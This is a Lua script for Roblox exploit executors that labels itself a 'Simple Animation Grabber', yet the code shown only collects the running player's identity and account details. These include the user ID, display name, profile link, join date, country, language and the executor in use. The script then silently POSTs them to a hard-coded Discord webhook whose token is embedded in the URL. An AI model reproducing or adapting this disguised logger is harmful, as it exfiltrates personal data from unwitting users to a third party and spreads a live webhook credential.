local PlaceId = game.PlaceId
local MarketplaceService = game:GetService("MarketplaceService")
local Asset = MarketplaceService:GetProductInfo(PlaceId)
local Player = game.Players.LocalPlayer
local joinTime = os.time() - (Player.AccountAge*86400)
local joinDate = os.date("!*t", joinTime)
local Players = game:GetService("Players")
local numPlayers = #Players:GetPlayers()
local username = game.Players.LocalPlayer.Name
local accountAge = game.Players.LocalPlayer.AccountAge
local plr = game.Players.LocalPlayer
local OSTime = os.time()
local Time = os.date('!*t', OSTime)

local function getexploit()
    local exploit =
        (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or 
        (isexecutorclosure and "Script-Ware V2") or
        (secure_load and "Sentinel") or
        (is_sirhurt_closure and "SirHurt V4") or
        (pebc_execute and "ProtoSmasher") or
        (KRNL_LOADED and "Krnl") or
        (WrapGlobal and "WeAreDevs") or
        (isvm and "Proxo") or
        (shadow_env and "Shadow") or
        (jit and "EasyExploits") or
        (getreg()['CalamariLuaEnv'] and "Calamari") or
        (unit and "Unit") or
        ("Undetectable")
    return exploit
end

local Content = 'Someone used Animation Grabber!'
local Embed = {
			["title"] = "__**New execution.**__",
			["description"] = "Name: "..plr.Name.."\nDisplay Name: "..plr.DisplayName,
			["type"] = "rich",
			["color"] = tonumber(0xffff00),
	                ["thumbnail"] = {
				["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432"
			},
			["image"] = {
				["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=250&y=250&Format=Png&username="..plr.Name
			},
			["fields"] = {
			    {
					["name"] = "__Name:__",
					["value"] = username, 
					["inline"] = true
			    },
			    {
					["name"] = "__Display Name:__",
					["value"] = game.Players.LocalPlayer.DisplayName, 
					["inline"] = true
			    },
		    	{
					["name"] = "__User ID:__",
					["value"] = plr.UserId,
					["inline"] = true
		   	},
                {
					["name"] = "__GameLightingTimeOfDay:__",
					["value"] = game.Lighting.TimeOfDay, 
					["inline"] = true
			    },
                {
					["name"] = "__Link Game:__",
					["value"] = "https://www.roblox.com/game/"..game.PlaceId.."/game", 
					["inline"] = true
			    },
                {
					["name"] = "__Link ProFile:__",
					["value"] = "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile", 
					["inline"] = true
			    },
                {
					["name"] = "__Name Game:__",
					["value"] = Asset.Name, 
					["inline"] = true
			    },
                {
					["name"] = "__Game Created:__",
					["value"] = Asset.Created, 
					["inline"] = true
			    },
                {
					["name"] = "__Game MaxPlayers:__",
					["value"] = game.Players.MaxPlayers, 
					["inline"] = true
			    },
                {
					["name"] = "__GameID:__",
					["value"] = game.GameId, 
					["inline"] = true
			    },
                {
					["name"] = "__Game PlaceId:__",
					["value"] = game.PlaceId, 
					["inline"] = true
			    },
                {
					["name"] = "__Game JobId:__",
					["value"] = game.JobId, 
					["inline"] = true
			    },
                {
					["name"] = "__Join Date Day:__",
					["value"] = joinDate.day, 
					["inline"] = true
			    },
                {
					["name"] = "__Join Date Month:__",
					["value"] = joinDate.month, 
					["inline"] = true
			    },
                {
					["name"] = "__Join Date Year:__",
					["value"] = joinDate.year, 
					["inline"] = true
			    }, 
		    	{
					["name"] = "__Account Age:__",
					["value"] = plr.AccountAge.." Day Ago",
					["inline"] = true
				},
                {
					["name"] = "__Account Age Yeare:__",
					["value"] = math.floor(game.Players.LocalPlayer.AccountAge/365*100)/(100), 
					["inline"] = true
			    },
                {
					["name"] = "__Country:__",
					["value"] = game:GetService("LocalizationService"):GetCountryRegionForPlayerAsync(game.Players.LocalPlayer), 
					["inline"] = true
			    },
                {
					["name"] = "__Language:__",
					["value"] = game.Players.LocalPlayer.LocaleId,
					["inline"] = true
			    },
                {
					["name"] = "__Executor:__",
					["value"] = identifyexecutor(), 
					["inline"] = true
				}
			},
			["footer"] = {
			    ["text"] = "Simple Animation Grabber",
			    ["icon_url"] = "https://i.imgur.com/IVjoIxh.jpeg"
			},
			["timestamp"] = string.format('%d-%d-%dT%02d:%02d:%02dZ', Time.year, Time.month, Time.day, Time.hour, Time.min, Time.sec),
};
(syn and syn.request or http_request or http.request) {
    Url = 'https://discord.com/api/webhooks/1271129129282179168/sI4hvPxciq30RlCEBhd7ag6NFW6luASGvDMD5QQQ82lt-FbjXIpGW32dPmjB6RC86qBr';
    Method = 'POST';
    Headers = {
        ['Content-Type'] = 'application/json';
    };
    Body = game:GetService'HttpService':JSONEncode({content = Content; embeds = {Embed}; });
};
